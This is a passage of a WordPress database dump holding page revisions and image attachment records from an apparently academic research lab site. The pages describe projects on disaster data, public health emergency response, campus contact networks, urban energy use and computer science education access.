gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">ORPHEUS</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:45:09','2023-09-29 14:45:09','',126,'https://gsudice.dataconn.net/?p=1524',0,'revision','',0),(1530,1,'2023-09-29 11:12:14','2023-09-29 15:12:14','','map1','','inherit','open','closed','','map1','','','2023-09-29 11:12:14','2023-09-29 15:12:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/map1.jpg',0,'attachment','image/jpeg',0),(1531,1,'2023-09-29 11:12:20','2023-09-29 15:12:20','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-map1.jpg','cropped-map1.jpg','','inherit','open','closed','','cropped-map1-jpg','','','2023-09-29 11:12:20','2023-09-29 15:12:20','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-map1.jpg',0,'attachment','image/jpeg',0),(1532,1,'2023-09-29 11:13:13','2023-09-29 15:13:13','','map1','','inherit','open','closed','','map1-2','','','2023-09-29 11:13:13','2023-09-29 15:13:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/map1-1.jpg',0,'attachment','image/jpeg',0),(1533,1,'2023-09-29 11:13:43','2023-09-29 15:13:43','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-map1-1.jpg','map1','','inherit','open','closed','','map1-3','','','2023-09-29 11:13:43','2023-09-29 15:13:43','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-map1-1.jpg',0,'attachment','image/jpeg',0),(1534,1,'2023-09-29 11:14:23','2023-09-29 15:14:23','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c40\",\"parentId\":\"126-c39\",\"partialId\":126,\"styleRef\":868,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}}}}},\"id\":\"126-c41\",\"parentId\":\"126-c39\",\"partialId\":126,\"children\":[{\"name\":\"hop-text\",\"parentId\":\"126-c41\",\"index\":2,\"id\":\"126-c44\",\"partialId\":126,\"styleRef\":872,\"type\":\"content\",\"props\":{\"content\":\"<p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes, and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. <\\/p>\"}}],\"styleRef\":869,\"type\":\"content\"}],\"id\":\"126-c39\",\"parentId\":\"126-c38\",\"partialId\":126,\"styleRef\":867,\"type\":\"content\"}],\"id\":\"126-c38\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":866,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 11:14:23','2023-09-29 15:14:23','',438,'https://gsudice.dataconn.net/?p=1534',0,'revision','',0),(1535,1,'2023-09-29 11:14:23','2023-09-29 15:14:23','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 